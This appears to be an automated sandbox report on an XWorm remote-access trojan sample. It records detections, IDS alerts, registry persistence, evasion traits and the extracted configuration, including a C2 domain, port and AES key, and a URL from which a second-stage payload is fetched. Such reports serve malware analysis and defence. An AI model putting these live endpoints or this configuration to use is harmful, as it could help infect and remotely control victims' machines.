Edit tour

Windows Analysis Report
H33UCslPzv.exe

Overview

General Information

Sample name:	H33UCslPzv.exe renamed because original name is a hash value
Original sample name:	462c6c970323f0e94eecb835032d8e993fca9ee0c6f944f656dfebde036479ed.exe
Analysis ID:	1542720
MD5:	9ecae0d26219ddb2355ad7b597887760
SHA1:	3946b3ad9b7233bdda8053c2410d796bdc9fa21d
SHA256:	462c6c970323f0e94eecb835032d8e993fca9ee0c6f944f656dfebde036479ed
Tags:	CloudflareTunnelsRATexeuser-JAMESWT_MHT
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected XWorm

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Sigma detected: New RUN Key Pointing to Suspicious Folder

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Uses dynamic DNS services

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

H33UCslPzv.exe (PID: 1528 cmdline: "C:\Users\user\Desktop\H33UCslPzv.exe" MD5: 9ECAE0D26219DDB2355AD7B597887760)

H33UCslPzv.exe (PID: 5968 cmdline: "C:\Users\user\Desktop\H33UCslPzv.exe" MD5: 9ECAE0D26219DDB2355AD7B597887760)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["xwor3july.duckdns.org"], "Port": "9402", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: H33UCslPzv.exe PID: 5968	JoeSecurity_XWorm	Yara detected XWorm	Joe Security

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\H33UCslPzv.exe, ProcessId: 5968, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Extra10

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\H33UCslPzv.exe, ProcessId: 5968, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Extra10

Suricata Signatures

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T08:45:04.331057+0200	2852870	1	Malware Command and Control Activity Detected	12.221.146.138	9402	192.168.2.9	58367	TCP
2024-10-26T08:45:09.456365+0200	2852870	1	Malware Command and Control Activity Detected	12.221.146.138	9402	192.168.2.9	58367	TCP
2024-10-26T08:45:23.795545+0200	2852870	1	Malware Command and Control Activity Detected	12.221.146.138	9402	192.168.2.9	58367	TCP
2024-10-26T08:45:34.355458+0200	2852870	1	Malware Command and Control Activity Detected	12.221.146.138	9402	192.168.2.9	58367	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T08:45:04.331057+0200	2852874	1	Malware Command and Control Activity Detected	12.221.146.138	9402	192.168.2.9	58367	TCP
2024-10-26T08:45:34.355458+0200	2852874	1	Malware Command and Control Activity Detected	12.221.146.138	9402	192.168.2.9	58367	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T08:45:09.209046+0200	2855924	1	Malware Command and Control Activity Detected	192.168.2.9	58367	12.221.146.138	9402	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: H33UCslPzv.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif

Avira: detection malicious, Label: TR/AD.NsisInject.oovyn

Found malware configuration

Source: 00000005.00000002.2750831860.0000000035981000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["xwor3july.duckdns.org"], "Port": "9402", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif

ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: H33UCslPzv.exe	ReversingLabs: Detection: 50%
Source: H33UCslPzv.exe	Virustotal: Detection: 63%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: H33UCslPzv.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 103.53.40.62:443 -> 192.168.2.9:50132 version: TLS 1.2

Source: H33UCslPzv.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 0_2_004062F0 FindFirstFileA,FindClose,	0_2_004062F0
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 0_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004057B5
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 0_2_00402765 FindFirstFileA,	0_2_00402765
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_00402765 FindFirstFileA,	5_2_00402765
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_004062F0 FindFirstFileA,FindClose,	5_2_004062F0
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_004057B5 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	5_2_004057B5

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 12.221.146.138:9402 -> 192.168.2.9:58367
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 12.221.146.138:9402 -> 192.168.2.9:58367
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:58367 -> 12.221.146.138:9402

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: xwor3july.duckdns.org

Uses dynamic DNS services

Source: unknown

DNS query: name: xwor3july.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.9:58367 -> 12.221.146.138:9402

Source: Joe Sandbox View

IP Address: 12.221.146.138 12.221.146.138

Source: Joe Sandbox View

ASN Name: ATT-INTERNET4US ATT-INTERNET4US

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /LfGiMdRCMSvlQHkIpf170.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: apslline.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: apslline.com
Source: global traffic	DNS traffic detected: DNS query: xwor3july.duckdns.org

Source: H33UCslPzv.exe, Thereagainst198.pif.5.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: H33UCslPzv.exe, Thereagainst198.pif.5.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: H33UCslPzv.exe, 00000005.00000002.2726386871.0000000005627000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apslline.com/A/9
Source: H33UCslPzv.exe, 00000005.00000002.2726386871.0000000005627000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apslline.com/F/&
Source: H33UCslPzv.exe, 00000005.00000002.2726708619.0000000006FB0000.00000004.00001000.00020000.00000000.sdmp, H33UCslPzv.exe, 00000005.00000002.2726386871.0000000005627000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apslline.com/LfGiMdRCMSvlQHkIpf170.bin

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 443

Source: unknown

HTTPS traffic detected: 103.53.40.62:443 -> 192.168.2.9:50132 version: TLS 1.2

Source: C:\Users\user\Desktop\H33UCslPzv.exe

Code function: 0_2_00405252 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405252

Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 0_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403248
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_00403289 lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		5_2_00403289

Source: C:\Users\user\Desktop\H33UCslPzv.exe

File created: C:\Windows\SysWOW64\traveskoen.ini

Jump to behavior

Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 0_2_70021A98	0_2_70021A98
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_000DEB98	5_2_000DEB98
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_000D0E98	5_2_000D0E98
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_38857950	5_2_38857950
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_3885BF28	5_2_3885BF28
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_38852240	5_2_38852240
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_38851561	5_2_38851561
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_3885B658	5_2_3885B658
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_388502B8	5_2_388502B8
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_38852230	5_2_38852230
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_3885B310	5_2_3885B310

Source: C:\Users\user\Desktop\H33UCslPzv.exe

Code function: String function: 00402B2C appears 50 times

Source: H33UCslPzv.exe, 00000005.00000002.2726386871.0000000005627000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs H33UCslPzv.exe
Source: H33UCslPzv.exe, 00000005.00000002.2751223108.0000000037CF9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs H33UCslPzv.exe

Source: H33UCslPzv.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/28@10/2

Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 0_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403248
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_00403289 lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		5_2_00403289

Source: C:\Users\user\Desktop\H33UCslPzv.exe

Code function: 0_2_0040450D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040450D

Source: C:\Users\user\Desktop\H33UCslPzv.exe

Code function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,

0_2_00402138

Source: C:\Users\user\Desktop\H33UCslPzv.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Mutant created: \Sessions\1\BaseNamedObjects\JIs7HXfvmVwG8wtR

Source: C:\Users\user\Desktop\H33UCslPzv.exe

File created: C:\Users\user\AppData\Local\Temp\nsr5955.tmp

Jump to behavior

Source: H33UCslPzv.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\H33UCslPzv.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\H33UCslPzv.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: H33UCslPzv.exe	ReversingLabs: Detection: 50%
Source: H33UCslPzv.exe	Virustotal: Detection: 63%

Source: C:\Users\user\Desktop\H33UCslPzv.exe

File read: C:\Users\user\Desktop\H33UCslPzv.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\H33UCslPzv.exe "C:\Users\user\Desktop\H33UCslPzv.exe"
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process created: C:\Users\user\Desktop\H33UCslPzv.exe "C:\Users\user\Desktop\H33UCslPzv.exe"
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process created: C:\Users\user\Desktop\H33UCslPzv.exe "C:\Users\user\Desktop\H33UCslPzv.exe"	Jump to behavior

Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Section loaded: winmm.dll	Jump to behavior

Source: C:\Users\user\Desktop\H33UCslPzv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: H33UCslPzv.exe

Static file information: File size 3212629 > 1048576

Source: H33UCslPzv.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\H33UCslPzv.exe

Code function: 0_2_70021A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_70021A98

Source: C:\Users\user\Desktop\H33UCslPzv.exe

Code function: 0_2_70022F60 push eax; ret

0_2_70022F8E

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\H33UCslPzv.exe

File created: C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif

Jump to dropped file

Source: C:\Users\user\Desktop\H33UCslPzv.exe	File created: C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif			Jump to dropped file
Source: C:\Users\user\Desktop\H33UCslPzv.exe	File created: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll			Jump to dropped file

Source: C:\Users\user\Desktop\H33UCslPzv.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Extra10	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Extra10	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Extra10	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Extra10	Jump to behavior

Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
